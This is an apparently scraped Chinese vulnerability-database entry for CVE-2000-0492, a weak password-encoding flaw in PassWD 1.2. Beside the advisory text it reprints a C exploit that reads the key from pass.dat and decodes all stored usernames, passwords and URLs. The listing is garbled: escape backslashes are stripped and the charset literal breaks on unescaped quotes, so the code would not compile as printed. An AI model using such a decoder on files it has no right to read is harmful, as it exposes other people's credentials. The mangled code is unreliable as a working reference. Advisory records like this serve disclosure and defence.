PassWD 1.2弱加密漏洞

PassWD 1.2弱加密漏洞

漏洞ID 1105871 漏洞类型 设计错误
发布时间 2000-06-04 更新时间 2005-10-20
图片[1]-PassWD 1.2弱加密漏洞-安全小百科CVE编号 CVE-2000-0492
图片[2]-PassWD 1.2弱加密漏洞-安全小百科CNNVD-ID CNNVD-200006-012
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19989
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-012
|漏洞详情
PassWD1.2版本使用弱加密(琐碎编码)存储密码。能读取密码文件的攻击者利用此漏洞可以轻松破解密码。
|漏洞EXP
source: http://www.securityfocus.com/bid/1300/info

PassWd 1.2 is a password management utility designed to store user login information to various URLs. The login information, which includes username, password and link location is stored in the pass.dat file which resides in the PassWD directory. The information is encrypted with a weak encoding algorithm and includes the key which can be used to decode any stored password. 

/*
 *  Decoder for PassWD v1.2 `pass.dat' password files
 *
 *  Written 2000 by Daniel Roethlisberger <[email protected]>
 *
 *  This code is hereby placed in the public domain.
 *  Use this code at your own risk for whatever you want.
 *
 *  The decoded data is not parsed in any way - it should
 *  be very easy to moderately experienced programmers
 *  to add that themselves.
 *
 */

#include <stdio.h>

void main(int argc, char *argv[])
{
   unsigned char charpos;
   FILE* outfile;
   FILE* infile;
   unsigned char a;
   unsigned char b;
   unsigned char key;
   unsigned char x;

   unsigned char charset[] = "btnr !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~btnr !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

   printf("nDecoder for PassWD v1.2 `pass.dat' password filesn");
   printf("Written 2000 by Daniel Roethlisberger <[email protected]>nn");

   if((argc > 3) || (argc < 2))
   {
      printf("Usage: %s <infile> [<outfile>]nn", argv[0]);
      printf("If <outfile> is omitted, the output is dumped to stdout.n", argv[0]);
      return;
   }

   infile = fopen(argv[1], "r");
   if(infile == NULL)
   {
      printf("Could not open file %sn", argv[1]);
      return;
   }

   if(argc == 2)
      outfile = stdout;
   else
   {
      outfile = fopen(argv[2], "w");
      if(outfile == NULL)
      {
         printf("Could not write to file %sn", argv[2]);
         _fcloseall();
         return;
      }
   }

   getc(infile);       /* jump over decoy byte    */
   a = getc(infile);   /* read encoded key byte 1 */
   b = getc(infile);   /* read encoded key byte 2 */

   if(b == EOF)
   {
      printf("ERROR - encountered EOF within headern");
      return;
   }

   /* this line `decodes' the key */
   key = (unsigned char)((a - 'b') * 10 + (b - 'b'));

   /* read through infile and dump decoded output to outfile: */
   x = getc(infile);
   while(!feof(infile))
   {
      for(charpos = 0; x != charset[charpos]; charpos++)
      {
         if(charpos > 99)
         {
            printf("nERROR - encountered illegal character in source filen");
            _fcloseall();
            return;
         }
      }
      /* plain = cypher - key */
      putc(charset[charpos + 99 - key], outfile);
      x = getc(infile);
   }

   if(argc == 2)
      printf("nn");
   printf("Done.n");

   _fcloseall();
   return;
}
|参考资料

来源:BUGTRAQ
名称:20000609InsecureencryptioninPassWDv1.2
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0450.html
来源:BID
名称:1300
链接:http://www.securityfocus.com/bid/1300

相关推荐: Squid HTCP支持选项无法动态调整漏洞

Squid HTCP支持选项无法动态调整漏洞 漏洞ID 1204703 漏洞类型 设计错误 发布时间 2002-02-21 更新时间 2005-10-12 CVE编号 CVE-2002-0067 CNNVD-ID CNNVD-200203-018 漏洞平台 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享